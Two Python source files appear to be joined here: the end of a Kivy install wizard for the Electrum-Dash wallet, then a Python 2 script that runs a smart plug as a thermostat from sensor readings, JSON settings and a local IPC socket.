Key"), self.xpub, True) popup.open() class AddXpubDialog(WizardDialog): def __init__(self, wizard, **kwargs): WizardDialog.__init__(self, wizard, **kwargs) self.is_valid = kwargs['is_valid'] self.title = kwargs['title'] self.message = kwargs['message'] self.allow_multi = kwargs.get('allow_multi', False) def check_text(self, dt): self.ids.next.disabled = not bool(self.is_valid(self.get_text())) def get_text(self): ti = self.ids.text_input return ti.text.strip() def get_params(self, button): return (self.get_text(),) def scan_xpub(self): def on_complete(text): if self.allow_multi: self.ids.text_input.text += text + '\n' else: self.ids.text_input.text = text self.app.scan_qr(on_complete) def do_paste(self): self.ids.text_input.text = test_xpub if is_test else self.app._clipboard.paste() def do_clear(self): self.ids.text_input.text = '' class InstallWizard(BaseWizard, Widget): ''' events:: `on_wizard_complete` Fired when the wizard is done creating/ restoring wallet/s. ''' __events__ = ('on_wizard_complete', ) def on_wizard_complete(self, wallet): """overriden by main_window""" pass def waiting_dialog(self, task, msg, on_finished=None): '''Perform a blocking task in the background by running the passed method in a thread. ''' def target(): # run your threaded function try: task() except Exception as err: self.show_error(str(err)) # on completion hide message Clock.schedule_once(lambda dt: app.info_bubble.hide(now=True), -1) if on_finished: def protected_on_finished(): try: on_finished() except Exception as e: self.show_error(str(e)) Clock.schedule_once(lambda dt: protected_on_finished(), -1) app = App.get_running_app() app.show_info_bubble( text=msg, icon='atlas://electrum_dash/gui/kivy/theming/light/important', pos=Window.center, width='200sp', arrow_pos=None, modal=True) t = threading.Thread(target = target) t.start() def terminate(self, **kwargs): self.dispatch('on_wizard_complete', self.wallet) def choice_dialog(self, **kwargs): choices = kwargs['choices'] if len(choices) > 1: WizardChoiceDialog(self, **kwargs).open() else: f = kwargs['run_next'] f(choices[0][0]) def multisig_dialog(self, **kwargs): WizardMultisigDialog(self, **kwargs).open() def show_seed_dialog(self, **kwargs): ShowSeedDialog(self, **kwargs).open() def line_dialog(self, **kwargs): LineDialog(self, **kwargs).open() def confirm_seed_dialog(self, **kwargs): kwargs['title'] = _('Confirm Seed') kwargs['message'] = _('Please retype your seed phrase, to confirm that you properly saved it') ConfirmSeedDialog(self, **kwargs).open() def restore_seed_dialog(self, **kwargs): RestoreSeedDialog(self, **kwargs).open() def confirm_dialog(self, **kwargs): WizardConfirmDialog(self, **kwargs).open() def tos_dialog(self, **kwargs): WizardTOSDialog(self, **kwargs).open() def email_dialog(self, **kwargs): WizardEmailDialog(self, **kwargs).open() def otp_dialog(self, **kwargs): if kwargs['otp_secret']: WizardNewOTPDialog(self, **kwargs).open() else: WizardKnownOTPDialog(self, **kwargs).open() def add_xpub_dialog(self, **kwargs): kwargs['message'] += ' ' + _('Use the camera button to scan a QR code.') AddXpubDialog(self, **kwargs).open() def add_cosigner_dialog(self, **kwargs): kwargs['title'] = _("Add Cosigner") + " %d"%kwargs['index'] kwargs['message'] = _('Please paste your cosigners master public key, or scan it using the camera button.') AddXpubDialog(self, **kwargs).open() def show_xpub_dialog(self, **kwargs): ShowXpubDialog(self, **kwargs).open() def show_message(self, msg): self.show_error(msg) def show_error(self, msg): app = App.get_running_app() Clock.schedule_once(lambda dt: app.show_error(msg)) def request_password(self, run_next, force_disable_encrypt_cb=False): if force_disable_encrypt_cb: # do not request PIN for watching-only wallets run_next(None, False) return def on_success(old_pin, pin): assert old_pin is None run_next(pin, False) def on_failure(): self.show_error(_('PIN mismatch')) self.run('request_password', run_next) popup = PasswordDialog() app = App.get_running_app() popup.init(app, None, _('Choose PIN code'), on_success, on_failure, is_change=2) popup.open() def action_dialog(self, action, run_next): f = getattr(self, action) f()
temperatureControlSwitch.py
import os import time import math import sys import json import copy from datetime import datetime from threading import Thread, Lock import temperatureSensorLib import smartPlugLib import ipc from getTempChartArray import updateTemperatureLogFile ################################################################################ # Setting Specified Via The .json File ################################################################################ class tempCtrlSwitchSettings(object): def __init__(self): self.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE = None # in seconds self.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE= None # in seconds self.TIME_BETWEEN_TEMPERATURE_CHECK = None # in seconds self.SWITCH_TEMPERATURE = None # in degrees Fahrenheit self.SWITCH_COMFORT_RANGE = None # in degrees Fahrenheit self.SWITCH_HEAT_COOL = None # -1 = Cool, 0 = Off, 1 = Heat self.SMART_PLUG_IP_ADDR = None self.TIME_OF_DAY_TO_START = None self.TIME_OF_DAY_TO_STOP = None self.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = False # False for off, True for on, None for no change self.TEMPERATURE_AVERAGE_TIME_AMOUNT = None self.INVALID_TEMPERATURE_LOW = None # in degrees Fahrenheit self.INVALID_TEMPERATURE_HIGH = None # in degrees Fahrenheit self.DEVICE_NAME = None self.DEVICE_COLOR = None def __eq__(self, obj): return isinstance(obj, tempCtrlSwitchSettings) and \ obj.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE == self.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE and \ obj.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE == self.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE and \ obj.TIME_BETWEEN_TEMPERATURE_CHECK == self.TIME_BETWEEN_TEMPERATURE_CHECK and \ obj.SWITCH_TEMPERATURE == self.SWITCH_TEMPERATURE and \ obj.SWITCH_COMFORT_RANGE == self.SWITCH_COMFORT_RANGE and \ obj.SWITCH_HEAT_COOL == self.SWITCH_HEAT_COOL and \ obj.SMART_PLUG_IP_ADDR == self.SMART_PLUG_IP_ADDR and \ obj.TIME_OF_DAY_TO_START == self.TIME_OF_DAY_TO_START and \ obj.TIME_OF_DAY_TO_STOP == self.TIME_OF_DAY_TO_STOP and \ obj.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP == self.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP and \ obj.TEMPERATURE_AVERAGE_TIME_AMOUNT == self.TEMPERATURE_AVERAGE_TIME_AMOUNT and \ obj.INVALID_TEMPERATURE_LOW == self.INVALID_TEMPERATURE_LOW and \ obj.INVALID_TEMPERATURE_HIGH == self.INVALID_TEMPERATURE_HIGH and \ obj.DEVICE_NAME == self.DEVICE_NAME and \ obj.DEVICE_COLOR == self.DEVICE_COLOR def __ne__(self, obj): result = self.__eq__(obj) if result is NotImplemented: return result return not result currentTempCtrlSettings = tempCtrlSwitchSettings() currentTempCtrlDict = dict() settingsMutex = Lock() ################################################################################ # Constant Variables ################################################################################ THIS_SCRIPT_DIR = os.path.dirname(os.path.realpath(__file__)) THIS_SCRIPT_FILENAME_NO_EXT = os.path.splitext(os.path.realpath(__file__))[0] JSON_PATH = THIS_SCRIPT_FILENAME_NO_EXT + '.json' IPC_SOCKET_PATH = os.path.join(THIS_SCRIPT_DIR, 'ipcSocket') WEB_LOG_PATH = os.path.join(THIS_SCRIPT_DIR, 'web', 'tempCtrlSwitch.log') ################################################################################ # Global Variables ################################################################################ WAY_IN_THE_PAST = -1000000 lastSuccessfulSwitchChangeTime = WAY_IN_THE_PAST # Initialize to a time way in the past to ensure lastFailedSwitchChangeTime = WAY_IN_THE_PAST # the switch can be set right away at boot time. nextTemperatureCheckTime = 0 checkForSwitchChangeDuringNonSwitchTime = True newParametersForMainLoop = True temperatureStoreValuesForAverage = [] lastTemperatureValue = None lastTemperatureAverage = None lastTemperatureLogTime = 0 currentSwitchState = None # False for off, True for on, None unknown logNewLine = '\n' logMaxLogLines_short = 5000 logLineToLeaveAfterTrim_short = 3000 logMaxLogLines_long = 50000 logLineToLeaveAfterTrim_long = 30000 ################################################################################ # Enumerated Values ################################################################################ SWITCH_STATE_OFF = "Off" SWITCH_STATE_ON = "On" SWITCH_STATE_NO_CHANGE = "No Change" CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED = "Success - No Change Needed" CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED = "Success - Switch State Changed" CHANGE_SWITCH_RESULT_FAILED = "Failed" ################################################################################ # Generic Helper Functions ################################################################################ def readWholeFile(path): retVal = "" try: fileId = open(path, 'r') retVal = fileId.read() fileId.close() except: pass return retVal def writeWholeFile(path, fileText): try: fileId = open(path, 'w') fileId.write(fileText) fileId.close() except: pass def appendFile(path, fileText): try: fileId = open(path, 'a') fileId.write(fileText) fileId.close() except: pass def limitLogSize(logFilePath, trimFromTop, logMaxLogLines, logLineToLeaveAfterTrim): logFile = readWholeFile(logFilePath) lineCount = logFile.count(logNewLine) if lineCount > logMaxLogLines: if trimFromTop: logFile = logNewLine.join(logFile.split(logNewLine)[-logLineToLeaveAfterTrim:]) else: logFile = logNewLine.join(logFile.split(logNewLine)[:logLineToLeaveAfterTrim]) writeWholeFile(logFilePath, logFile) def logMsg(printMsg, unimportantMsg = False): shortTimeFormat = "%H:%M %m/%d" # 24 hour value #shortTimeFormat = "%I:%M%p %m/%d" # 12 hour value with AM/PM shortTimeStr = "{}".format(time.strftime(shortTimeFormat)) longTimeStr = str(datetime.now()) logMsg = '[' + longTimeStr + "] " + printMsg print(logMsg) logPath = os.path.splitext(os.path.realpath(__file__))[0] + '.log' appendFile(logPath, logMsg + logNewLine) limitLogSize(logPath, True, logMaxLogLines_long, logLineToLeaveAfterTrim_long) try: if not unimportantMsg: temperatureStr = str(lastTemperatureValue) if lastTemperatureValue != None: temperatureStr = "{:.1f}".format(lastTemperatureValue) logMsg = temperatureStr + " " + shortTimeStr + "-" + printMsg writeWholeFile(WEB_LOG_PATH, logMsg + logNewLine + readWholeFile(WEB_LOG_PATH)) limitLogSize(WEB_LOG_PATH, False, logMaxLogLines_short, logLineToLeaveAfterTrim_short) except: print "Failed to log to web. - " + WEB_LOG_PATH def getCurrentTime(): uptime_seconds = None try: with open('/proc/uptime', 'r') as f: uptime_seconds = float(f.readline().split()[0]) except: logMsg("Failed to get current time") return uptime_seconds ################################################################################ # JSON Functions ################################################################################ def strToTimeInt(inStr): try: iniTimeStr = inStr.lower() hour = 0 minute = 0 isPm = None # Determine AM / PM if iniTimeStr[-2:] == "pm": isPm = True elif iniTimeStr[-2:] == "am": isPm = False if isPm != None: iniTimeStr = iniTimeStr[:-2] if ':' in iniTimeStr: hour = int(iniTimeStr.split(':')[0]) minute = int(iniTimeStr.split(':')[1]) else: totalTime = int(iniTimeStr) if totalTime >= 100: hour = totalTime / 100 minute = totalTime % 100 elif totalTime < 24: hour = totalTime minute = 0 else: # this one seem unlikely to get to hour = 0 minute = totalTime if hour >= 12 and isPm == None: isPm = True if hour >= 12: hour -= 12 if isPm: hour += 12 return hour*100 + minute except: raise ValueError('Invalid Time Read.') return None def timeIntToStr(timeInt, useAmPm = False): if useAmPm: # 12 Hour with AM / PM amPmStr = " AM" hour = int(timeInt / 100) minute = int(timeInt % 100) if hour >= 12: amPmStr = " PM" if hour >= 13: hour -= 12 elif hour == 0: hour = 12 else: # 24 hour that the web server wants. amPmStr = "" hour = int(timeInt / 100) minute = int(timeInt % 100) return "{:02d}:{:02d}".format(hour, minute) + amPmStr def tryDictSettingToType(convertFunc, settingsDict, dictStr, origVal): dictEntryExists = False convertFuncSuccess = False retVal = origVal try: dictVal = settingsDict[dictStr] dictEntryExists = True except: pass if dictEntryExists: try: retVal = convertFunc(dictVal) convertFuncSuccess = True except: pass return [dictEntryExists, convertFuncSuccess, retVal] def getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted): return [allValid and exists and converted, allAvailValid and (converted or not exists), anyValid or converted] def dictToClass(settingsDict, settingsClass): allValid = True allAvailValid = True anyValid = False exists = False converted = False val = None [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'MinTimeBetweenChangingSwitchState', settingsClass.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE) settingsClass.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'MinTimeBetweenRetryingSwitchChange', settingsClass.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE) settingsClass.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'TimeBetweenTempCheck', settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK) settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'SwitchTemperature', settingsClass.SWITCH_TEMPERATURE) settingsClass.SWITCH_TEMPERATURE = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'SwitchComfortRange', settingsClass.SWITCH_COMFORT_RANGE) settingsClass.SWITCH_COMFORT_RANGE = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'SwitchHeatCool', settingsClass.SWITCH_HEAT_COOL) settingsClass.SWITCH_HEAT_COOL = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(str, settingsDict, 'SmartPlugIpAddr', settingsClass.SMART_PLUG_IP_ADDR) settingsClass.SMART_PLUG_IP_ADDR = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(strToTimeInt, settingsDict, 'TimeOfDayToStart', settingsClass.TIME_OF_DAY_TO_START) settingsClass.TIME_OF_DAY_TO_START = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(strToTimeInt, settingsDict, 'TimeOfDayToStop', settingsClass.TIME_OF_DAY_TO_STOP) settingsClass.TIME_OF_DAY_TO_STOP = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'InvalidTempLow', settingsClass.INVALID_TEMPERATURE_LOW) settingsClass.INVALID_TEMPERATURE_LOW = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(float, settingsDict, 'InvalidTempHigh', settingsClass.INVALID_TEMPERATURE_HIGH) settingsClass.INVALID_TEMPERATURE_HIGH = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(str, settingsDict, 'DeviceName', settingsClass.DEVICE_NAME) settingsClass.DEVICE_NAME = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) [exists, converted, val] = tryDictSettingToType(str, settingsDict, 'DeviceColor', settingsClass.DEVICE_COLOR) settingsClass.DEVICE_COLOR = val [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) # Do SwitchStateAfterTimeOfDayStop last so we can do a little extra conversion. [exists, converted, val] = tryDictSettingToType(str, settingsDict, 'SwitchStateAfterTimeOfDayStop', settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP) [allValid, allAvailValid, anyValid] = getValidDictToClass(allValid, allAvailValid, anyValid, exists, converted) if converted: # Determine what to set the switch to when entering the time of day to stop controlling the switch. finalSwitchStateStr = val.lower() if finalSwitchStateStr == 'off': settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = False elif finalSwitchStateStr == 'on': settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = True else: settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP = None # This should be the last thing (since it is calculated from other ini values). if settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK != None: settingsClass.TEMPERATURE_AVERAGE_TIME_AMOUNT = settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK * 5 else: settingsClass.TEMPERATURE_AVERAGE_TIME_AMOUNT = None return [allValid, allAvailValid, anyValid] def floatToIntStr(floatVal): if floatVal > 0.0: return str(int(floatVal + 0.5)) elif floatVal < 0.0: return str(-int(-floatVal + 0.5)) else: return str(0) def temperatureToStr(tempVal): if float(int(tempVal)) == float(tempVal): return str(int(tempVal)) else: return "{:.1f}".format(tempVal) def safeConvertToStr(convertFunc, inVal, failRetVal = ""): retVal = failRetVal try: retVal = convertFunc(inVal) except: pass return retVal def switchStateAfterTimeOfDayStop_toStr(SwitchStateAfterTimeOfDayStop_val): if SwitchStateAfterTimeOfDayStop_val == False: retVal = 'Off' elif SwitchStateAfterTimeOfDayStop_val == True: retVal = 'On' else: retVal = 'No Change' return retVal def heatCool_toStr(heatCool_val): if heatCool_val < 0: retVal = 'Cool' elif heatCool_val > 0: retVal = 'Heat' else: retVal = 'Off' return retVal def classToDict(settingsClass, settingsDict): settingsDict['MinTimeBetweenChangingSwitchState'] = safeConvertToStr(floatToIntStr, settingsClass.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE) settingsDict['MinTimeBetweenRetryingSwitchChange'] = safeConvertToStr(floatToIntStr, settingsClass.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE) settingsDict['TimeBetweenTempCheck'] = safeConvertToStr(floatToIntStr, settingsClass.TIME_BETWEEN_TEMPERATURE_CHECK) settingsDict['SwitchTemperature'] = safeConvertToStr(temperatureToStr, settingsClass.SWITCH_TEMPERATURE) settingsDict['SwitchComfortRange'] = safeConvertToStr(temperatureToStr, settingsClass.SWITCH_COMFORT_RANGE) settingsDict['SwitchHeatCool'] = safeConvertToStr(floatToIntStr, settingsClass.SWITCH_HEAT_COOL) settingsDict['SmartPlugIpAddr'] = settingsClass.SMART_PLUG_IP_ADDR settingsDict['TimeOfDayToStart'] = safeConvertToStr(timeIntToStr, settingsClass.TIME_OF_DAY_TO_START) settingsDict['TimeOfDayToStop'] = safeConvertToStr(timeIntToStr, settingsClass.TIME_OF_DAY_TO_STOP) settingsDict['InvalidTempLow'] = safeConvertToStr(temperatureToStr, settingsClass.INVALID_TEMPERATURE_LOW) settingsDict['InvalidTempHigh'] = safeConvertToStr(temperatureToStr, settingsClass.INVALID_TEMPERATURE_HIGH) # Determine what to set the switch to when entering the time of day to stop controlling the switch. settingsDict['SwitchStateAfterTimeOfDayStop'] = switchStateAfterTimeOfDayStop_toStr(settingsClass.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP) settingsDict['DeviceName'] = settingsClass.DEVICE_NAME settingsDict['DeviceColor'] = settingsClass.DEVICE_COLOR def fixOldJsonVersions(jsonToFix): fixed = False try: onTemp = float(jsonToFix['SwitchOnTemp']) offTemp = float(jsonToFix['SwitchOffTemp']) jsonToFix['SwitchTemperature'] = safeConvertToStr( temperatureToStr, (onTemp+offTemp) / 2.0 ) jsonToFix['SwitchComfortRange'] = safeConvertToStr( temperatureToStr, abs(onTemp-offTemp) ) if onTemp > offTemp: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, -1) # Cool elif onTemp < offTemp: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, 1) # Heat else: jsonToFix['SwitchHeatCool'] = safeConvertToStr(int, 0) # Off del jsonToFix['SwitchOnTemp'] del jsonToFix['SwitchOffTemp'] fixed = True except: pass return jsonToFix def loadSettingsFromJson(): global currentTempCtrlSettings global currentTempCtrlDict success = True try: jsonFromFileSystem = json.loads(readWholeFile(JSON_PATH)) # Fix if needed (i.e. check if importing on older version of the .json file) if fixOldJsonVersions(jsonFromFileSystem): writeWholeFile(JSON_PATH, json.dumps(jsonFromFileSystem, indent=3)) # Store off the new version # Copy to the Global Variable currentTempCtrlDict = jsonFromFileSystem success = dictToClass(currentTempCtrlDict, currentTempCtrlSettings)[0] # [0] is allValid except: success = False return success def printTempCtrlSettings(tempCtrlSettings): try: degreeSign= u'\N{DEGREE SIGN}' timeUnit = " sec" tempUnit = " " + '' + "F" # Print in opposite order to make it appear in the correct order in the short log (i.e. last print at top) logMsg("Temp Avg Time = " + str(tempCtrlSettings.TEMPERATURE_AVERAGE_TIME_AMOUNT) + timeUnit) logMsg("Switch State After = " + switchStateAfterTimeOfDayStop_toStr(tempCtrlSettings.SWITCH_STATE_AFTER_TIME_OF_DAY_STOP)) logMsg("Invalid Temp High = " + str(tempCtrlSettings.INVALID_TEMPERATURE_HIGH) + tempUnit) logMsg("Invalid Tem Low = " + str(tempCtrlSettings.INVALID_TEMPERATURE_LOW)+ tempUnit) logMsg("Temp Check Time = " + str(tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK) + timeUnit) logMsg("Min Switch Retry Time = " + str(tempCtrlSettings.MIN_TIME_BETWEEN_RETRYING_SWITCH_CHANGE) + timeUnit) logMsg("Min Switch Toggle Time = " + str(tempCtrlSettings.MIN_TIME_BETWEEN_CHANGING_SWITCH_STATE) + timeUnit) logMsg("Smart Plug Ip Addr = " + str(tempCtrlSettings.SMART_PLUG_IP_ADDR)) logMsg("Heat/Cool/Off = " + heatCool_toStr(tempCtrlSettings.SWITCH_HEAT_COOL)) logMsg("Comfort Range = " + str(tempCtrlSettings.SWITCH_COMFORT_RANGE) + tempUnit) logMsg("Temperature = " + str(tempCtrlSettings.SWITCH_TEMPERATURE) + tempUnit) logMsg("Stop Time = " + timeIntToStr(tempCtrlSettings.TIME_OF_DAY_TO_STOP, True)) logMsg("Start Time = " + timeIntToStr(tempCtrlSettings.TIME_OF_DAY_TO_START, True)) logMsg("Device Color = " + str(tempCtrlSettings.DEVICE_COLOR)) logMsg("Device Name = " + str(tempCtrlSettings.DEVICE_NAME)) except: pass ################################################################################ # IPC Server For New Json Settings ################################################################################ class Event(ipc.Message): def __init__(self, event_type, **properties): self.type = event_type self.properties = properties def _get_args(self): return [self.type], self.properties class Response(ipc.Message): def __init__(self, text): self.text = text def _get_args(self): return [self.text], {} def updateSettingsFromDict(newSettingsDict): global currentTempCtrlDict global currentTempCtrlSettings global checkForSwitchChangeDuringNonSwitchTime global newParametersForMainLoop try: newTempCtrlSettings = copy.copy(currentTempCtrlSettings) # pass in a copy of the current settings. dictToClass will only change the settings that are valid from the dict. success = dictToClass(newSettingsDict, newTempCtrlSettings)[2] # [2] is the anyValid flag. If set some settings passed in where valid (i.e. newTempCtrlSettings was updated) if success and currentTempCtrlSettings != newTempCtrlSettings: currentTempCtrlSettings = newTempCtrlSettings classToDict(newTempCtrlSettings, currentTempCtrlDict) checkForSwitchChangeDuringNonSwitchTime = True newParametersForMainLoop = True logMsg("### Recieved New Settings") printTempCtrlSettings(currentTempCtrlSettings) writeWholeFile(JSON_PATH, json.dumps(currentTempCtrlDict, indent=3)) elif success: logMsg("##### Recieved Same Settings") elif not success: logMsg("##### Recieved Invalid Settings") except: pass def getStatus(): # Returns Dictionary global lastTemperatureAverage global currentSwitchState status = dict() switchStateString = "Unknown" if currentSwitchState != None and currentSwitchState == True: switchStateString = "On" elif currentSwitchState != None and currentSwitchState == False: switchStateString = "Off" try: status['Temp'] = "{:.1f}".format(lastTemperatureAverage) except: status['Temp'] = "" status['SwitchState'] = switchStateString return status def getIpcResonseJsonStr(): global currentTempCtrlSettings global currentTempCtrlDict statusDict = getStatus() settingsDict = dict() try: classToDict(currentTempCtrlSettings, settingsDict) except: settingsDict = currentTempCtrlDict retVal = "" try: combinedDict = dict() combinedDict['status'] = statusDict combinedDict['settings'] = settingsDict retVal = json.dumps(combinedDict) except: logMsg("##### Something very bad happened: getIpcResonseJsonStr") return retVal def ipcMessageCallback(objects): global currentTempCtrlSettings global settingsMutex settingsMutex.acquire() # Lock Mutex # Try to parse the input message as a json. useNewSettings = True try: newSettingsDict = json.loads(objects[0].properties['json']) except: useNewSettings = False # Try to use the new settings. if useNewSettings: updateSettingsFromDict(newSettingsDict) # Respond with the current settings. response = [Response(getIpcResonseJsonStr())] settingsMutex.release() # Unlock Mutex return response def runIpcServer(socketPath): ipc.Server(socketPath, ipcMessageCallback).serve_forever() def setupIcpServer(socketPath): if os.path.exists(socketPath): os.remove(socketPath) t = Thread(target=runIpcServer, args=(socketPath,)) t.start() # Make sure the socket file is accessible by the webserver. for i in range(100): if os.path.exists(socketPath): os.system('chmod 666 ' + socketPath) # allow anyone to read/write break else: time.sleep(0.1) ################################################################################ # Temperature Helper Functions ################################################################################ def getTemperature(tempCtrlSettings): curTemperature = temperatureSensorLib.temperatureSensor_getFahrenheit() retVal = curTemperature try: global temperatureStoreValuesForAverage global lastTemperatureValue global lastTemperatureAverage lastTemperatureValue = curTemperature if curTemperature != None: if curTemperature > tempCtrlSettings.INVALID_TEMPERATURE_HIGH or curTemperature < tempCtrlSettings.INVALID_TEMPERATURE_LOW: logMsg("Invalid temperature from sensor: " + str(curTemperature)) curTemperature = None else: temperatureStoreValuesForAverage.append(curTemperature) else: logMsg("Failed to read from temperature sensor.") # Remove old temperature values from the list. maxNumValuesToStore = int(math.ceil(tempCtrlSettings.TEMPERATURE_AVERAGE_TIME_AMOUNT / tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK)) if len(temperatureStoreValuesForAverage) >= maxNumValuesToStore: temperatureStoreValuesForAverage = temperatureStoreValuesForAverage[-maxNumValuesToStore:] # Compute the average temperature from all the values in the list. averageSum = 0 for temp in temperatureStoreValuesForAverage: averageSum += temp averageTemperature = averageSum / len(temperatureStoreValuesForAverage) retVal = averageTemperature lastTemperatureAverage = averageTemperature except: logMsg("Failed somewhere in computing average temperature.") return retVal def determineIfSwitchStateNeedsToBeSet(temperature, tempCtrlSettings): retVal = SWITCH_STATE_NO_CHANGE try: deltaTemp = tempCtrlSettings.SWITCH_COMFORT_RANGE / 2.0 if tempCtrlSettings.SWITCH_HEAT_COOL < 0: # Cool onTemp = tempCtrlSettings.SWITCH_TEMPERATURE + deltaTemp offTemp = tempCtrlSettings.SWITCH_TEMPERATURE - deltaTemp if temperature >= onTemp: retVal = SWITCH_STATE_ON elif temperature <= offTemp: retVal = SWITCH_STATE_OFF elif tempCtrlSettings.SWITCH_HEAT_COOL > 0: # Heat onTemp = tempCtrlSettings.SWITCH_TEMPERATURE - deltaTemp offTemp = tempCtrlSettings.SWITCH_TEMPERATURE + deltaTemp if temperature <= onTemp: retVal = SWITCH_STATE_ON elif temperature >= offTemp: retVal = SWITCH_STATE_OFF except: logMsg("Failed to determine if the switch state needs to be set.") return retVal ################################################################################ # Smart Plug Helper Functions ################################################################################ def setSmartPlugState_withCheck(switchState, tempCtrlSettings): global currentSwitchState # Check for situation where we need to return silently. This is used for situations where no smart switch exists, but the temperature sensor is being manually monitored. if tempCtrlSettings.SMART_PLUG_IP_ADDR == None or tempCtrlSettings.SMART_PLUG_IP_ADDR == "": currentSwitchState = True if switchState == SWITCH_STATE_ON else False return CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED retVal = CHANGE_SWITCH_RESULT_FAILED try: desiredSwitchState = False # False for off, True for on if switchState == SWITCH_STATE_ON: desiredSwitchState = True currentSwitchState = smartPlugLib.smartPlug_getState(tempCtrlSettings.SMART_PLUG_IP_ADDR) if currentSwitchState != None: if currentSwitchState != desiredSwitchState: logMsg("Changing switch state to: " + str(switchState)) time.sleep(1) # Just talked to the switch to determine status. Wait a moment before setting the new state. (Probably not necessary, but shouldn't hurt either.) success = smartPlugLib.smartPlug_onOff(tempCtrlSettings.SMART_PLUG_IP_ADDR, desiredSwitchState) if success: retVal = CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED else: retVal = CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED else: logMsg("Failed to determine the current state of the switch.") except: logMsg("Failed somewhere in the process of setting the state of the switch.") return retVal def setSmartPlugState_withoutCheck(switchState, tempCtrlSettings): global currentSwitchState # Check for situation where we need to return silently. This is used for situations where no smart switch exists, but the temperature sensor is being manually monitored. if tempCtrlSettings.SMART_PLUG_IP_ADDR == None or tempCtrlSettings.SMART_PLUG_IP_ADDR == "": currentSwitchState = True if switchState == SWITCH_STATE_ON else False return CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED retVal = CHANGE_SWITCH_RESULT_FAILED try: desiredSwitchState = False # False for off, True for on if switchState == SWITCH_STATE_ON: desiredSwitchState = True switchStateIsChanging = False if currentSwitchState != None and currentSwitchState == desiredSwitchState: pass # Nothing to do else: logMsg("Changing switch state to: " + str(switchState)) switchStateIsChanging = True success = smartPlugLib.smartPlug_onOff(tempCtrlSettings.SMART_PLUG_IP_ADDR, desiredSwitchState) if success: currentSwitchState = desiredSwitchState if switchStateIsChanging: retVal = CHANGE_SWITCH_RESULT_SUCCESS_SWITCH_STATE_CHANGED else: retVal = CHANGE_SWITCH_RESULT_SUCCESS_NO_CHANGE_NEEDED except: logMsg("Failed somewhere in the process of setting the state of the switch.") return retVal ################################################################################ # Time Helper Functions ################################################################################ def getSleepTimeUntilNextTemperatureCheckTime(tempCtrlSettings): global nextTemperatureCheckTime sleepTime = tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK try: # Determine the next time to check the temperature. nextTemperatureCheckTime += tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK currentTime = getCurrentTime() while nextTemperatureCheckTime < currentTime: nextTemperatureCheckTime += tempCtrlSettings.TIME_BETWEEN_TEMPERATURE_CHECK # Sleep until the next time to check the temperature. sleepTime = nextTemperatureCheckTime - currentTime except: logMsg("Failed to determine sleep amount, using default.") return sleepTime def isItTimeOfDayToControlSwitch(tempCtrlSettings): retVal = False try: timeFormatStr = "%H%M" # Note: default time format string is 